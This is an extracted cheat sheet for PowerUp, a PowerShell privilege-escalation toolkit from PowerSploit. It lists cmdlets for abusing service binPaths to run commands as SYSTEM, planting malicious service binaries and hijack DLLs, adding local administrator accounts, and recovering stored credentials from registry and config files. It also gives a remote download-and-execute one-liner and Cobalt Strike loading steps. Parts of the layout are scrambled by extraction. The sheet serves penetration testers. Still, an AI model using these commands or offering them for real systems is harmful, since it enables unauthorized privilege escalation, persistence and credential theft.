PowerUp
Cheat Sheet
Weaponizing Service Vulnerabilities
Invoke-ServiceAbuse abuses a vulnerable services
binPath to execute commands as SYSTEM.
Install-ServiceBinary installs a malicious C# binary for a
specified service.
Getting Started
Note: PowerUps bleeding edge will always in be the
development branch of PowerSploit.
Get PowerUp: [Link]
Load from disk: 1) C:\> powershell exec bypass 2) PS
C:\> Import-Module PowerUp.ps1
Load from GitHub: PS C:\> IEX (New-Object
[Link]).DownloadString("[Link]
Load in Cobalt Strikes Beacon: beacon> powershellimport /local/path/to/PowerUp.ps1 , then beacon>
powershell Invoke-AllChecks
Both cmdlets accept the following parameters (as well as
accepting a service names/service object from GetService on the pipeline):
Service name to abuse.
-Name SERVICE
The username to add
(defaults to john). Domain
users are not created, only
added to the LocalGroup.
-UserName
[DOMAIN\]USER
The password for the added
user (defaults to
Password123!).
-Password
P@55Word
The group to add the user to
(default: Administrators).
-LocalGroup NAME
Enumerating Service Vulnerabilities
Get-ModifiableService
GetModifiableServiceFile
Get-ServiceUnquoted
Enumerates all services
where the current user can
modify the service binPath.
Enumerates all services
where the current user can
write to the associated
service binary or its
arguments.
Enumerates all services w/
unquoted binary paths.
GetRegistryAlwaysInstall
Elevated
Checks if the
"AlwaysInstallElevated" key
is set. This means that MSI
installation packages always
run as SYSTEM.
GetRegistryAutoLogon
Returns any autologon
credentials from various
registry locations.
GetModifiableRegistryAu
toRun
Returns autoruns where the
current user can modify the
binary/script (or its config).
Miscellaneous Checks
Custom command to execute. -Command net
Getting help: PS C:\> Get-Help Cmdlet-Name [-detailed] [- Install-ServiceBinary backs up the original service path to
full]
\orig_path.[Link]. Restore-ServiceBinary will restore
Most PowerUp functions are implemented in Empire in
this backup binary to its original path.
privesc/powerup/*
Set-ServiceBinPath can set a services binPath without
Invoke-AllChecks will run all current privilege escalation
checks detailed in this guide and will output the
appropriate abuse function syntax for anything found. The
HTMLReport flag will write out a HTML version of the
report to [Link].
Registry Checks
caling [Link].
DLL Hijacking
Find-PathDLLHijack checks if the current %PATH% has
any directories that are writeable by the current user.
Weaponizable for Windows 7 with Write-HijackDll and
FOLDER\PATH\[Link].
Write-HijackDll writes out a self-deleting .bat file to
\hijackpath\[Link] that executes a command, and
writes out a hijackable DLL that launches the .bat. It
accepts the same -UserName/-Password/-Command
arguments as Invoke-ServiceAbuse as well as:
Path to write the hijack
DLL
-DllPath
PATH\[Link]
Manual arch specification.
-Architecture [x64/x86]
Path of the .bat for the
hijackable .dll to run.
-BatPath PATH\[Link]
Version 1.1. Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.
GetUnattendedInstallFile
Checks for leftover
[Link] files.
Get-Webconfig
Recovers cleartext and
encrypted connection strings
from all [Link]. Credit
to Scott Sutherland.
Get-ApplicationHost
Recovers encrypted
application pool and virtual
directory passwords from
the [Link].
Credit to Scott Sutherland.
Get-SiteListPassword
Searches for any McAfee
[Link] files and
decrypts the contents
Helpers
Get-ModifiablePath
Tokenizes a string and
returns any files that the
current user can modify.
GetCurrentUserTokenGro
upSid
Returns all SIDs that the
current user is a part of even
if the SID is disabled.
Add-ServiceDacl
Adds a Dacl field to an object
returned by Get-Service.
More Information
[Link]
[Link]
